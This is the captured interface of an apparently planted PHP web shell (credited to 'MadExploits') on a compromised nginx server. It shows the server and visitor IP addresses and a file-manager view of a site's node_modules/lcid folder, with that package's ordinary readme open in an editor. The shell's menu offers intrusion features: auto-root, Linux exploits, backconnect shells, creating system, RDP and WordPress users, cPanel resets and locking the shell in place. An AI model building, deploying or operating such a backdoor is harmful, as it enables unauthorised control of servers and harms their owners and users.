Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya.biz /
amatya /
node_modules /
lcid /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
427
B
-rwxrwxr-x
lcid.json
3.19
KB
-rwxrwxr-x
license
1.08
KB
-rwxrwxr-x
package.json
922
B
-rwxrwxr-x
readme.md
843
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# lcid [](https://travis-ci.org/sindresorhus/lcid) > Mapping between [standard locale identifiers](https://en.wikipedia.org/wiki/Locale_(computer_software)) and [Windows locale identifiers (LCID)](http://en.wikipedia.org/wiki/Locale#Specifics_for_Microsoft_platforms) Based on the [mapping](https://github.com/python/cpython/blob/8f7bb100d0fa7fb2714f3953b5b627878277c7c6/Lib/locale.py#L1465-L1674) used in the Python standard library. The mapping itself is just a [JSON file](lcid.json) and can be used wherever. ## Install ``` $ npm install lcid ``` ## Usage ```js const lcid = require('lcid'); lcid.from(1044); //=> 'nb_NO' lcid.to('nb_NO'); //=> 1044 lcid.all; //=> {'af_ZA': 1078, ...} ``` ## License MIT © [Sindre Sorhus](https://sindresorhus.com)
Close